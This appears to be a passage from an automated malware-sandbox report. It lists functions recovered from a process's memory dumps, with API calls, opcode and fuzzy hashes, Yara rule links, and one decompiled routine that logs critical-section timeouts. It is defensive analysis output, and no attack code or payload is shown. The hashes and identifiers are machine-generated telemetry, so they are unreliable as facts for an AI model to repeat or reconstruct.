                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,003CCFB2,003CCFB2,?,00000000,?,?), ref: 003D8A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 461ad38a56e1be1be9b57a1a35410789d1f4814218c2486d615b739fa0d42dad
                                                                      • Instruction ID: b2f04313a6b70d7ae952063553e22fa4b2cf1871162261300a15e3567f66cfdd
                                                                      • Opcode Fuzzy Hash: 461ad38a56e1be1be9b57a1a35410789d1f4814218c2486d615b739fa0d42dad
                                                                      • Instruction Fuzzy Hash: BCF08CB2600204AFDB21DF94EC44EE737A9EF88360F05845AF90C9B300D931E8108BB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D73F4, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,003CCCE0,?,?), ref: 003D743C
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 4f125925b0435a4dbbc4884746fe48f7711e42df2b6253a6bdaf93769d99ac95
                                                                      • Instruction ID: 27335626b109ded25f886cf1865511d6159897f4741362a7b3874d9829f7f036
                                                                      • Opcode Fuzzy Hash: 4f125925b0435a4dbbc4884746fe48f7711e42df2b6253a6bdaf93769d99ac95
                                                                      • Instruction Fuzzy Hash: 4AF0EC732442003AD3325668DC43FE7F768DF91B10F154129F64AAF2C1D691F9018665
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D8A20, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,003CCFB2,003CCFB2,?,00000000,?,?), ref: 003D8A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction ID: 74c5a5287b1b5e4cb6112afa4bf9c36233b2df968bcfb95c94ea8d66dd17ed48
                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction Fuzzy Hash: 06E01AB12002086BDB10DF49DC85EE737ADAF89650F018155BA085B341C930E8108BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003CD420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,003C7C83,?), ref: 003CD44B
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                                      • Instruction ID: 073ccbc8ca75c421e7eb92b4e3f0c87cb499ab5d08325dde6363babc0bfdf32c
                                                                      • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                                      • Instruction Fuzzy Hash: AAD05E627503042AE610BAA49C03F2672885B44B00F494074FA48DA3C3D964E9004162
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D8967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3e72b9b0507866a0a8a9254bcc01a6a88de6d8256206013652c6bc0c47686314
                                                                      • Instruction ID: 5a569479e58eabbfaa0bf04e262662896d67b1ea9ce420c4986dbeb03de92202
                                                                      • Opcode Fuzzy Hash: 3e72b9b0507866a0a8a9254bcc01a6a88de6d8256206013652c6bc0c47686314
                                                                      • Instruction Fuzzy Hash: 2FB092B29024C5CAEB11F7A14B08B3B7A01BBD4741F26C062E24206B1A4778C8D1F6B6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 02DDFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 53%
                                                                      			E02DDFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02D8CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02DD5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02DD5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                      0x02ddfdda
                                                                      0x02ddfde2
                                                                      0x02ddfde5
                                                                      0x02ddfdec
                                                                      0x02ddfdfa
                                                                      0x02ddfdff
                                                                      0x02ddfe0a
                                                                      0x02ddfe0f
                                                                      0x02ddfe17
                                                                      0x02ddfe1e
                                                                      0x02ddfe19
                                                                      0x02ddfe19
                                                                      0x02ddfe19
                                                                      0x02ddfe20
                                                                      0x02ddfe21
                                                                      0x02ddfe22
                                                                      0x02ddfe25
                                                                      0x02ddfe40

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DDFDFA
                                                                      Strings
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02DDFE2B
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02DDFE01
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: cb7e3cccaedbdeb1bb52ccfc6add512762696aec928d9f649aba4086b3f8605c
                                                                      • Instruction ID: c44cbf23067bccb81202deb4ff0ba45292cdb755d59bac9206ea9bc5bd22202a
                                                                      • Opcode Fuzzy Hash: cb7e3cccaedbdeb1bb52ccfc6add512762696aec928d9f649aba4086b3f8605c
                                                                      • Instruction Fuzzy Hash: D5F0F632600601BFE6251B55EC06F23BB6BEB44730F244315F628566D1DA62FC20C6F0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%